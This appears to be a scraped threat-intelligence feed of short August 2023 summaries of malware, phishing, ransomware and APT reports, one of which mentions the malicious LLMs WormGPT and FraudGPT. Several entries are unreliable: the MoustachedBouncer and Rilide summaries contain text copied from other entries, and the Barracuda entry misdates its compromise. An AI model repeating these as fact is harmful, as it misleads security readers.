Summary:: Last couple months Netskope Threat Labs analysts has been monitoring a staggering 61-fold increase in traffic to phishing pages hosted in Cloudflare R2. The most of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps. The attacks have been targeting victims mainly in North America and Asia, across different segments, led by the technology, financial services, and banking sectors.

Source: https://www.netskope.com/blog/evasive-phishing-campaign-steals-cloud-credentials-using-cloudflare-r2-and-turnstile

Intel Source:: Trustwave

Intel Name:: The_rise_of_LLM_engines_WormGPT_and_FraudGPT

Date of Scan:: 2023-08-16

Impact:: LOW

Summary:: Trustwave researchers discussed in their blog two such LLM engines that were up for sale available on underground forums, WormGPT and FraudGPT. If criminals would get their own ChatGPT-like tool, the implications for cybersecurity, social engineering, and overall digital safety could be so damagimg. This prospect highlights the importance of staying vigilant in our efforts to secure, and responsibly develop, artificial intelligence technology in order to mitigate potential risks and safeguard against misuse.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/wormgpt-and-fraudgpt-the-rise-of-malicious-llms/ https://netenrich.com/blog/fraudgpt-the-villain-avatar-of-chatgpt

Intel Source:: Trellix

Intel Name:: NetSupportRAT_exploring_new_techniques

Date of Scan:: 2023-08-15

Impact:: LOW

Summary:: Trellix researchers observed a new campaign using fake Chrome browser updates to trick victims to install a remote administration software tool called NetSupport Manager. The threat actors take advantage of this software to steal information and take control of victim computers. The detected campaign has similarity with previously reported SocGholish campaign, which was run by a suspected Russian threat actor.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/new-techniques-of-fake-browser-updates.html

Intel Source:: Cyfirma

Intel Name:: Stealthy_Malicious_MSI_Loader

Date of Scan:: 2023-08-15

Impact:: LOW

Summary:: The Cyfirma reserachers has observed a disguised Stealthy MSI Loader being advertised in dark web forums by Russian threat actor, showcasing it has a potential ability to evade detection by both Virus Total scan and Windows Defender. Additionally, through the researchers's investigation, it was established a link between this MSI Loader and the BatLoader campaign observed in March 2023, highlighting potential coordination between these threats.

Source: https://www.cyfirma.com/outofband/stealthy-malicious-msi-loader-overlapping-technique-and-infrastructure-with-batloader/

Intel Source:: HP ThreatResearch

Intel Name:: The_malware_campaigns_use_a_variety_of_programming_languages

Date of Scan:: 2023-08-15

Impact:: LOW

Summary:: Last couple months, HP ThreatResrearch team have noticed a surge of finance-themed malicious spam campaigns spreading malware through batch scripts (.bat). The campaigns use a wide variety of programming languages to achieve different objectives within the infection chain – from batch scripts, PowerShell, Go, shellcode to .NET.

Source: https://threatresearch.ext.hp.com/do-you-speak-multiple-languages-malware-does/

Intel Source:: Fortinet

Intel Name:: Continues_OSS_Supply_Chain_Attacks_Hidden_in_the_Python_Package

Date of Scan:: 2023-08-15

Impact:: LOW

Summary:: Python Package Index (PyPI) packages have become a common thing for threat actors to post malware that unsuspecting victims possible download. The FortiGuard Labs analysts has been monitoring that activity attack vector for some time and posted the update of the zero-day attacks they have discovered. Recently, they discovered several new zero-day PyPI attacks using this AI engine assistant.

Source: https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi

Intel Source:: Zscaler

Intel Name:: Unraveling_a_New_Threat_Targeting_LATAM_FinTech_Users

Date of Scan:: 2023-08-14

Impact:: MEDIUM

Summary:: JanelaRAT, a newly discovered cyber threat, has been unveiled by Zscaler ThreatLabz. Primarily focused on the Latin American (LATAM) financial sector, this sophisticated malware employs advanced techniques including DLL side-loading and dynamic command and control infrastructure. With capabilities ranging from evasive maneuvers to self-defense mechanisms, the threat aims to compromise sensitive financial data. The malware's origins are suggested by Portuguese strings in its code and a Portuguese-speaking developer, highlighting its targeted region and intentions.

Source: https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech

Intel Source:: Trendmicro

Intel Name:: Monti_Ransomware_Group_Resumes_Attacks_with_New_Linux_Variant

Date of Scan:: 2023-08-14

Impact:: MEDIUM

Summary:: Trend Micro researchers observe the Monti ransomware group, resembling Conti, resumes attacks on legal and government sectors with a fresh Linux variant. Unlike previous versions, this variant modifies encryption methods, uses an infection marker, and alters system files.

Source: https://www.trendmicro.com/en_us/research/23/h/monti-ransomware-unleashes-a-new-encryptor-for-linux.html

Intel Source:: CERT UA

Intel Name:: Phishing_Attack_Targeting_Government_Agencies

Date of Scan:: 2023-08-14

Impact:: MEDIUM

Summary:: CERT-UA has identified a phishing attack on government agencies involving fraudulent emails from CERT-UA urging password change through a malicious link. The attackers imitate Roundcube's interface and use a deceptive subdomain

Source: https://cert.gov.ua/article/5455833

Intel Source:: Akamai

Intel Name:: New_Magento_Campaign_Discovered_called_Xurum

Date of Scan:: 2023-08-14

Impact:: LOW

Summary:: Over the past few months, Akamai has been closely monitoring a focused campaign that specifically targets a relatively small number of Magento deployments. They dubbed the campaign Xurum to reference the domain name of the C2 server utilized by the attacker.

Source: https://www.akamai.com/blog/security-research/new-sophisticated-magento-campaign-xurum-webshell#:~:text=Akamai%20researchers%20have%20discovered%20an%20ongoing%20server-side%20template of%20the%20attacker%E2%80%99s%20command%20and%20control%20%28C2%29%20server.

Intel Source:: CISA

Intel Name:: Updates_on_SEASPY_and_WHIRLPOOL_Backdoors

Date of Scan:: 2023-08-14

Impact:: MEDIUM

Summary:: The US Department of Homeland Security (CISA) has published a report on Barracuda email servers that were compromised by cyber-thieves in the summer of 2016 and the following year. CISA obtained four malware samples - including SEASPY and WHIRLPOOL backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).

Source: https://www.cisa.gov/news-events/analysis-reports/ar23-221a

Intel Source:: PaloAlto

Intel Name:: The_SugarCRM_CVE_2023_22952_zero_day_vulnerability

Date of Scan:: 2023-08-12

Impact:: MEDIUM

Summary:: A zero-day vulnerability in the SugarCRM customer relationship management platform was used by threat actors to gain access to customers' AWS accounts, according to a report from Palo Alto Networks Unit 42.

Source: https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/

Intel Source:: SOCRadar

Intel Name:: A_new_cybercriminals_service_called_Dark_Utilities

Date of Scan:: 2023-08-12

Impact:: MEDIUM

Summary:: In their blog, Cisco Talos shared that they observed malware samples using Dark Utilities service in the wild to establish C2 communications channels and remote access capabilities on infected systems. They discovered malware targeted Windows and Linux systems leveraging Dark Utilities

Source: https://socradar.io/dark-utilities-platform-provides-c2-server-for-threat-actors/

Intel Source:: Sucuri

Intel Name:: The_surge_in_malware_cases_linked_to_a_Gootloader_payload_delivery

Date of Scan:: 2023-08-12

Impact:: LOW

Summary:: This month, Sucuri analysts traced a noticeable surge in malwares linked to a malicious payload delivery system known as Gootloader. The group behind this malware is believed to operate a malware-as-a-service operation, exclusively providing a malware delivery service for other threat actors. In their blog, Sucuri is dicussing why Gootloader is so effective, and go into the details of inner workings and shed light on the tactics employed by the operators behind it.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/

Intel Source:: Sucuri

Intel Name:: Hybrid_malware_leveraging_various_internet_protocols

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: Sucuri analysts discover periodically an unique hybrid malware leveraging various internet protocols. During a recent investigation, the analysts found an interesting piece of JavaScript malware that indirectly uses the DNS protocol to obtain redirect URLs.

Source: https://blog.sucuri.net/2023/08/from-google-dns-to-tech-support-scam-sites-unmasking-the-malware-trail.html

Intel Source:: Sentinelone

Intel Name:: In_Depth_Analysis_of_LOLKEK_Payloads

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: Researchers from SentinelLabs have examined LOLKEK Payload sample sets. Small to medium-sized enterprises (SMBs) and individual users are typically the main objectives.

Source: https://www.sentinelone.com/blog/lolkek-unmasked-an-in-depth-analysis-of-new-samples-and-evolving-tactics/

Intel Source:: ASEC

Intel Name:: Changes_in_CHM_Malware_Distribution

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: ASEC has previously published a CHM malware type coping Korean financial institutes and insurance companies. Recently, the execution method of this malware type has been changing every week. ASEC post will cover how the changed execution processes of the CHM malware are recorded in AhnLab’s EDR products.

Source: https://asec.ahnlab.com/en/55972/

Intel Source:: Cyble

Intel Name:: The_Most_Recent_STRRAT_Version_Contains_Dual_Obfuscation_Layers

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: The Cyble Research and Intelligence Labs have discovered a fresh method of infection that is used to spread STRRAT. This novel approach entails disseminating STRRAT version 1.6, which makes use of two string obfuscation strategies.

Source: https://cyble.com/blog/strrats-latest-version-incorporates-dual-obfuscation-layers/

Intel Source:: Kaspersky

Intel Name:: Common_TTPs_of_attacks_against_industrial_organizations

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: Kaspersky ICS Cert analysts identified over 15 implants and their variants planted by the threat actor(s) in various combinations. The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems. Analysts have medium to high confidence that a threat actor called APT31, also known as Judgment Panda and Zirconium, is behind the activities described in their report.

Source: https://ics-cert.kaspersky.com/publications/reports/2023/08/10/common-ttps-of-attacks-against-industrial-organizations-implants-for-uploading-data/

Intel Source:: WeliveSecurity

Intel Name:: MoustachedBouncer_cyberespionage_activity_against_diplomats

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: MoustachedBouncer is a cyberespionage group discovered by ESET Research since 2014. Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild. Welinesecurity reserachers believe that MoustachedBouncer uses a lawful interception system (such as SORM) to conduct its AitM operations.

Source: https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Intel Source:: Fortinet

Intel Name:: Attackers_Using_Freezers_And_SYK_Crypter_to_Distribute_Malware

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: Researchers from FortiGuard have discovered a brand-new Rust-written injector that can introduce XWorm and shellcode into a victim's environment. Additionally, an investigation by researchers showed a sharp rise in injector activity in May 2023. To avoid antivirus detection, shellcode can be encrypted using AES, RC4, or LZMA, and it can be Base64-encoded.

Source: https://www.fortinet.com/blog/threat-research/malware-distributed-via-freezers-and-syk-crypter

Intel Source:: CrowdStrike

Intel Name:: Zero_Day_Exploit_Case_Study_CVE_2023_36874

Date of Scan:: 2023-08-11

Impact:: MEDIUM

Summary:: In July 2023, the CrowdStrike Falcon team observed an unknown exploit with unknown vulnerability affecting the Windows Error Reporting (WER) component. Crowdstrike team put their findings to their report about this new vulnerability to Microsoft. Microsoft assigned the identifier CVE-2023-36874 to the vulnerability.

Source: https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/

Intel Source:: Securelist

Intel Name:: Unknown_Actor_Using_DroxiDat_and_Cobalt_Strike

Date of Scan:: 2023-08-11

Impact:: LOW

Summary:: Securelist researchers have seen a new SystemBC variant deployed to a critical infrastructure target. This time, the proxy-capable backdoor was deployed alongside Cobalt Strike beacons in a South African nation’s critical infrastructure.

Source: https://securelist.com/focus-on-droxidat-systembc/110302/

Intel Source:: Eclecticiq

Intel Name:: Campaign_Against_NATO_Aligned_Foreign_Ministries

Date of Scan:: 2023-08-11

Impact:: MEDIUM

Summary:: Two PDF documents have been spotted, and EclecticIQ researchers believe with high confidence that they are a part of a continuous campaign aimed at NATO member countries' foreign ministries. The PDF files contained two fake diplomatic invitations that appeared to be coming from the German embassy.

Source: https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs

Intel Source:: AT&T

Intel Name:: AdLoad_Turns_Mac_Systems_into_Proxy_Exit_Nodes

Date of Scan:: 2023-08-10

Impact:: LOW

Summary:: Thousands of IPs have been seen by AT&T Alien Labs to act as proxy exit nodes in a way that resembles corrupted AdLoad systems. This activity might be a sign that tens of thousands of Mac computers have been taken over and used as proxy exit nodes. Over the past year, at least 150 samples have been seen in the wild.

Source: https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload

Intel Source:: Proofpoint

Intel Name:: Attackers_Using_EvilProxy_Phishing_Kit

Date of Scan:: 2023-08-10

Impact:: HIGH

Summary:: Threat actors have been using the phishing toolkit EvilProxy to take control of cloud-based Microsoft 365 accounts belonging to executives at prominent companies.Researchers said the attacks exhibited both the prevalence of pre-packaged phishing-as-a-service toolkits, as well as the increased bypassing of multi-factor authentication to gain access to accounts.

Source: https://www.proofpoint.com/us/blog/email-and-cloud-threats/cloud-account-takeover-campaign-leveraging-evilproxy-targets-top-level

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_Injection

Date of Scan:: 2023-08-10

Impact:: LOW

Summary:: High numbers of the Magniber ransomware are routinely disseminated. It has been disseminated through the Internet Explorer vulnerability for the past few years, however when the browser's support ended, the vulnerability is no longer being exploited. Recently, the ransomware has started spreading through Chrome and Edge browsers using filenames impersonating Windows security update packages (such as ERROR.Center.Security.msi). Currently, Magniber injects the ransomware into an active process, causing damage by encrypting the user's files.

Source: https://asec.ahnlab.com/en/55961/

Intel Source:: ASEC

Intel Name:: Tax_Invoices_and_Shipping_Statements_Posing_as_GuLoader_Malware

Date of Scan:: 2023-08-10

Impact:: LOW

Summary:: Researchers from ASEC have discovered instances in which GuLoader was sent as an attachment in emails that were falsely labeled as shipping bills and tax invoices. A RAR (Roshal Archive packed) packed file included the freshly discovered GuLoader variation. GuLoader eventually downloads well-known malware strains including Remcos, AgentTesla, and Vidar when it is run by a user.

Source: https://asec.ahnlab.com/en/55978/

Intel Source:: Zscalar

Intel Name:: New_InfoStealer_Named_Statc_Stealer

Date of Scan:: 2023-08-09

Impact:: LOW

Summary:: Zscaler ThreatLabz researchers have discovered a new information stealer family called Statc Stealer. It is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.

Source: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat

Intel Source:: Aquasec

Intel Name:: Kubernetes_Exposed

Date of Scan:: 2023-08-09

Impact:: LOW

Summary:: The potential catastrophe of having Kubernetes (k8s) cluster hijacked is could be a disaster magnified a million times over. Aquasec researchers investigated and uncovered Kubernetes clusters belonging to more than 350 organizations, open-source projects, and individuals, openly accessible and largely unprotected. At least 60% of them were breached and had an active campaign that deployed malware and backdoors.

Source: https://blog.aquasec.com/kubernetes-exposed-one-yaml-away-from-disaster

Intel Source:: ReversingLabs

Intel Name:: Malicious_Python_Package_Campaign_Targets_Developers_through_PyPI

Date of Scan:: 2023-08-09

Impact:: MEDIUM

Summary:: Researchers from ReversingLabs identified persistent campaign leverages malicious Python packages on PyPI to deceive developers. Attackers mimic popular open-source tools, embedding hidden malicious code. They create matching GitHub repositories for credibility and employ dynamic command and control URLs

Source: https://www.reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules

Intel Source:: ASEC

Intel Name:: The_Malware_distribution_as_Coin_exchange

Date of Scan:: 2023-08-09

Impact:: LOW

Summary:: ASEC lab response Center has recently discovered a new malware disguised with coin exchange and investment-related topics. The malware is pretended in the form of an executable and a Word file.It is suspected that it was created by the Kimsuky group.

Source: https://asec.ahnlab.com/en/55944/

Intel Source:: ASEC

Intel Name:: The_malware_installation_as_normal_file_of_a_Korean_Development_Company

Date of Scan:: 2023-08-09

Impact:: LOW

Summary:: AhnLab has previously mentioned about the malware that is generated by the installation file of a Korean program development company. When malware is distributed alongside an installation file, users will struggle to notice that malware is being executed concurrently.

Source: https://asec.ahnlab.com/en/55940/

Intel Source:: Cyble

Intel Name:: Uncovering_Tech_Scammers_involved_in_different_ransomware_attacks

Date of Scan:: 2023-08-09

Impact:: LOW

Summary:: Cyble researchers recently observed a new Tech Scam campaign. It seemed it has involved scammers setting up a non-existent antivirus solution site to deceive users into paying for non-existent services. During analysis, researchers discovered various ransomware variants leveraged by tech scammers to propagate their fraudulent schemes.

Source: https://cyble.com/blog/utilization-of-leaked-ransomware-builders-in-tech-related-scams/

Intel Source:: Cyble

Intel Name:: The_AgentTesla_malware_attack

Date of Scan:: 2023-08-09

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into opening Tax related documents and accompanying control panel files (CPL).

Source: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/

Intel Source:: Team-Cymru

Intel Name:: An_Overview_of_Qakbot_Infrastructure

Date of Scan:: 2023-08-08

Impact:: LOW

Summary:: Team-Cymru researchers have provided an update on the high-level analysis of QakBot infrastructure, this represents an ongoing piece of research, their analysis of QakBot is fluid with various hypotheses being identified and tested. As and when they uncover new insights into QakBot campaigns they will seek to provide further written updates.

Source: https://www.team-cymru.com/post/visualizing-qakbot-infrastructure-part-ii-uncharted-territory

Intel Source:: SOC Radar

Intel Name:: Investigating_the_Big_Head_Ransomware

Date of Scan:: 2023-08-08

Impact:: LOW

Summary:: After first appearing in May 2023, Big Head Ransomware is a relatively new actor in the cyber threat environment. This malicious program is made up of several different varieties, each with its own features and powers. Little is known about the threat actor who is responsible for the Big Head Ransomware. The actor has been seen interacting with victims on Telegram and through emails.

Source: https://socradar.io/dark-web-profile-big-head-ransomware/

Intel Source:: Trend Micro

Intel Name:: Water_minyades_batloader_malware

Date of Scan:: 2023-08-07

Impact:: MEDIUM

Summary:: Trend Micro researchers observe the Water Minyades Batloader malware has evolved with Pyarmor Pro obfuscation, making manual de-obfuscation difficult. Using large MSI files, it initiates a sophisticated kill chain, fingerprinting victim networks and delivering second-stage payloads for stealthy attacks.

Source: https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html

Intel Source:: TrendMicro

Intel Name:: TargetCompany_Ransomware_Abusing_FUD_Obfuscator_Packers

Date of Scan:: 2023-08-07

Impact:: LOW

Summary:: In order to persistently deploy its initial stage, the most recent version of the TargetCompany ransomware first exploits weak SQL servers. The code tries many approaches to try persistence, such as switching the URLs or relevant routes, until it successfully locates a location to run the Remcos RAT.

Source: https://www.trendmicro.com/en_us/research/23/h/targetcompany-ransomware-abuses-fud-obfuscator-packers.html

Intel Source:: Fortinet

Intel Name:: DoDo_and_Proton_Ransomware_targeting_windows_users

Date of Scan:: 2023-08-07

Impact:: MEDIUM

Summary:: Researchers from Fortinet have discovered the Ransomware Roundup report highlights the emerging threats of DoDo and Proton ransomware variants, both specifically designed to target Microsoft Windows users. DoDo ransomware, a derivative of Chaos ransomware, disguises itself as an educational application called "Mercurial Grabber" to steal information and encrypt victims' files. Its recent variants demand ransom for file decryption and data non-disclosure. Meanwhile, Proton ransomware encrypts files on Windows systems, demanding a ransom for file recovery.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-dodo-and-proton

Intel Source:: Sentilone

Intel Name:: North_Korea_icompromised_Russian_Missile_Engineering_Company

Date of Scan:: 2023-08-07

Impact:: MEDIUM

Summary:: SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya. Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.

Source: https://www.sentinelone.com/labs/comrades-in-arms-north-korea-compromises-sanctioned-russian-missile-engineering-company/

Intel Source:: Security Affairs

Intel Name:: NPM_highly_targeted_attacks

Date of Scan:: 2023-08-07

Impact:: LOW

Summary:: Security Affairs researchers discovered a new set of malicious packages on the npm package manager that can exfiltrate sensitive developer data.

Source: https://securityaffairs.com/149165/hacking/npm-highly-targeted-attacks.html

Intel Source:: Talos

Intel Name:: New_Threat_Actor_Leveraging_Customized_Yashma_Ransomware

Date of Scan:: 2023-08-07

Impact:: LOW

Summary:: Researchers from Cisco Talos have identified an unknown threat actor, who appears to be of Vietnamese descent, who has been operating ransomware since at least June 4, 2023. This continuing attack makes use of a Yashma ransomware version that mimics WannaCry traits and is expected to target several locations. The ransom note is sent using an unusual method by the threat actor. They execute an embedded batch file to download the ransom note from the actor-controlled GitHub repository rather than inserting the ransom note strings in the malware.

Source: https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/

Intel Source:: CERT UA

Intel Name:: MerlinAgent_cyber_attacks_against_Ukraine

Date of Scan:: 2023-08-07

Impact:: LOW

Summary:: Ukraine's CERT-UA is warning of malicious emails posing as official communications. The emails contain harmful attachments, leading to the execution of dangerous scripts and the deployment of the malicious "ctlhost.exe" associated with the MerlinAgent program

Source: https://cert.gov.ua/article/5391805

Intel Source:: PT Security

Intel Name:: The_Cyber_Campaign_by_Space_Pirates_in_Russia_and_Serbia

Date of Scan:: 2023-08-05

Impact:: MEDIUM

Summary:: Using unique strategies and acquiring new cyber weapons, the threat actor known as Space Pirates has been connected to attacks on at least 16 organizations in Serbia and Russia over the past year. Governmental organizations, educational institutions, private security firms, aerospace makers, agricultural producers, defense, energy, and healthcare companies are among the targets.

Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/

Intel Source:: MetaBase Q

Intel Name:: Botnet_Fenix_new_botnet

Date of Scan:: 2023-08-04

Impact:: LOW

Summary:: The Threat Intel team at Metabase Q has discovered a local group that created a new botnet called as “Fenix,” which specifically targets users accessing government services, particularly tax-paying individuals in Mexico and Chile. The attackers redirect victims to fraudulent websites that mimic the official portals These fake websites prompt users to download a supposed security tool, claiming it will enhance their portal navigation safety

Source: https://www.metabaseq.com/fenix-botnet/

Intel Source:: Any.Run

Intel Name:: Remcos_Malware_Analysis

Date of Scan:: 2023-08-04

Impact:: LOW

Summary:: Any.Run malware hunting service recorded a video for Remcos RAT execution and analysis. Remcos is a remote access trojan – a malware used to take remote control over infected PCs. This trojan is created and sold to clients by a “business” called Breaking Security. Remcos trojan can be delivered in different forms. Based on RAT's analysis, it can be spread as an executable file with the name that should convince users to open it, or it pretends to bne a Microsoft Word file that exploits vulnerabilities.

Source: https://any.run/malware-trends/remcos

Intel Source:: SOC Radar

Intel Name:: The_Attack_Method_of_Rhysida_Ransomware

Date of Scan:: 2023-08-04

Impact:: LOW

Summary:: The Rhysida Ransomware Group has become a serious threat in the online environment. In a short period of time, Rhysida posed a significant concern to businesses all across the world with its powerful encryption capabilities and double extortion tactics. The group's emphasis on attacking military and governmental institutions, as seen in their assault on the Chilean Army, emphasizes how serious their actions may be.

Source: https://socradar.io/threat-profile-rhysida-ransomware/

Intel Source:: TrendMicro

Intel Name:: The_Play_ransomware_activity

Date of Scan:: 2023-08-04

Impact:: MEDIUM

Summary:: TrendMicro have observed the Play ransomware group amplified their activity with a number of new tools and exploits, including the vulnerabilities ProxyNotShell, OWASSRF, and a Microsoft Exchange Server Remote Code Execution. More recently, it’s also begun to use new tools like Grixba, a custom network scanner and infostealer, and the open-source VSS management tool AlphaVSS.

Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play

Intel Source:: Securelist

Intel Name:: Emotet_DarkGate_and_LokiBot_new_analyses

Date of Scan:: 2023-08-04

Impact:: MEDIUM

Summary:: Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.

Source: https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/

Intel Source:: ISC.SANS

Intel Name:: From_Small_LNK_to_Large_Malicious_BAT_File_With_Zero_VT_Score

Date of Scan:: 2023-08-04

Impact:: LOW

Summary:: ISC.SANS researchers have seen my spam trap caught an e-mail with LNK attachment, the e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient.

Source: https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/

Intel Source:: McAfee

Intel Name:: The_Back_to_School_Scams

Date of Scan:: 2023-08-04

Impact:: LOW

Summary:: McAfee Labs analysts has discovered the following PDFs targeting back-to-school trends. Their article warns the parents on what to educate their children on and how not to fall victim to such fraud. McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-season-of-back-to-school-scams/

Intel Source:: Any Run

Intel Name:: Redline_Malware_Analysis

Date of Scan:: 2023-08-04

Impact:: LOW

Summary:: ANY.RUN researchers did the analysis and watched the RedLine malware actions in an interactive sandbox simulation. RedLine Stealer or RedLine is malware that can collect users’ confidential information and deliver other malicious programs.

Source: https://any.run/malware-trends/redline

Intel Source:: Trustwave

Intel Name:: New_Rilide_Stealer_Version

Date of Scan:: 2023-08-04

Impact:: LOW

Summary:: Securelist researchers found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. They described all three in private reports, from which this post contains an excerpt.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/new-rilide-stealer-version-targets-banking-data-and-works-around-google-chrome-manifest-v3/

Intel Source:: Microsoft

Intel Name:: Hackers_Sent_Phishing_Emails_Masquerading_as_Microsoft_Teams_Chats

Date of Scan:: 2023-08-03

Impact:: MEDIUM

Summary:: In "highly targeted social engineering attacks," hackers within the Russian military utilized Microsoft Teams discussions as phishing baits. The IT giant announced on Wednesday that it has discovered a campaign by the well-known Russian hacker collective Midnight Blizzard, also known as NOBELIUM, Cozy Bear, or APT29. According to U.S. and U.K. law enforcement organizations, the group is a component of the Russian Federation's Foreign Intelligence Service.

Source: https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/

Intel Source:: Sentilone

Intel Name:: Illicit_Brand_Impersonation

Date of Scan:: 2023-08-03

Impact:: LOW

Summary:: Santilone researchers continually observe brands being impersonated for illicit use, including credential phishing and malware delivery. In their blog they shared examples of opportunistic and targeted threat actors impersonating trusted brands and they can make use of new tooling for the purposes of hunting and tracking them moving forward.

Source: https://www.sentinelone.com/blog/illicit-brand-impersonation-a-threat-hunting-approach/

Intel Source:: ASEC

Intel Name:: Linux_Systems_Are_Affected_by_Reptile_Malware

Date of Scan:: 2023-08-03

Impact:: LOW

Summary:: ASEC has recently observed Reptile, an open-source Linux rootkit with powerful concealment features and Port Knocking capabilities. It examines real-world attacks, including those targeting Korean companies, and draws parallels to the Mélofée malware.

Source: https://asec.ahnlab.com/en/55785/

Intel Source:: ASEC

Intel Name:: Sliver_C2_malware_being_distributed

Date of Scan:: 2023-08-03

Impact:: LOW

Summary:: ASEC has recently observed similar malware from the past SparkRAT being distributed while being pretending as setup files for Korean VPN service providers and marketing program producers. Contrary the past cases where SparkRAT was used, Sliver C2 was used in the recent attacks and techniques to avoid detection were employed.

Source: https://asec.ahnlab.com/en/55652/

Intel Source:: Recorded Future

Intel Name:: Russian_APT_BlueCharlie_Swaps_Infrastructure_to_Evade_Detection

Date of Scan:: 2023-08-03

Impact:: LOW

Summary:: Researchers from Recorded Future have identified the latest campaign from BlueCharlie, the group completely switched up its infrastructure, creating nearly 100 new domains from which to perform credential harvesting and follow-on espionage attacks.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0802.pdf

Intel Source:: CISA

Intel Name:: Attackers_Exploiting_Ivanti_EPMM_Vulnerabilities

Date of Scan:: 2023-08-02

Impact:: MEDIUM

Summary:: In response to the active exploitation of CVE-2023-35078 and CVE-2023-35081, the Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) have released a joint cybersecurity advisory. From at least April 2023 to July 2023, advanced persistent threat actors used CVE-2023-35078 as a zero-day exploit to collect data from a number of Norwegian enterprises as well as to access and compromise the network of a Norwegian government agency.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a

Intel Source:: Cado Security

Intel Name:: New_P2Pinfect_Malware_Campaign_Against_Redis_Servers_Detailed

Date of Scan:: 2023-08-02

Impact:: LOW

Summary:: Researchers from Cado Security Labs have just discovered a brand-new malware campaign that targets Redis data store deployments that are open to the general public. The malware, which was created in Rust and given the name "P2Pinfect" by the creators, functions as a botnet agent. An embedded Portable Executable (PE) and an additional ELF executable are both included in the sample that researchers analyzed, indicating cross-platform compatibility between Windows and Linux.

Source: https://www.cadosecurity.com/redis-p2pinfect/

Intel Source:: Halcyon

Intel Name:: Ransomware_Command_and_Control_Providers_report

Date of Scan:: 2023-08-02

Impact:: LOW

Summary:: The Halcyon researchers shared their research that observed new techniques used to unmask yet another Ransomware Economy player that is speed up ransomware attacks and state-sponsored APT operations like Command-and-Control Providers (C2P) who sell services to threat actors while assuming a legal business profile. In their report, titled Cloudzy with a Chance of Ransomware, Halcyon showed a unique method for identifying C2P entities that can be used to forecast the pioneer to major ransomware campaigns and other advanced attacks. Halcyon also identifies two new, previously undisclosed ransomware affiliates Halcyon named them as Ghost Clown and Space Kook that currently deploy BlackBasta and Royal, respectively.

Source: https://www.halcyon.ai/blog/report-ransomware-command-and-control-providers-unmasked-by-halcyon-researchers

Intel Source:: PaloAlto

Intel Name:: NodeStealer_2_0_The_Python_Version

Date of Scan:: 2023-08-02

Impact:: LOW

Summary:: Unit 42 researchers have recently discovered a previously unreported phishing campaign that distributed an infostealer equipped to fully take over Facebook business accounts. Facebook business accounts were targeted with a phishing lure offering tools such as spreadsheet templates for busines

Source: https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/

Intel Source:: Trustwave

Intel Name:: New_Variant_of_SkidMap_Targeting_Redis

Date of Scan:: 2023-08-02

Impact:: LOW

Summary:: Researchers from Trustwave examined the most recent logs from a honeypot in central Europe and discovered an intriguing entry that appeared again less than two weeks later. Only open Redis instances are targeted by SkidMap (also known as "NO AUTH"). They haven't noticed brute-force attacks coming from the precise IP where the initial attack started.

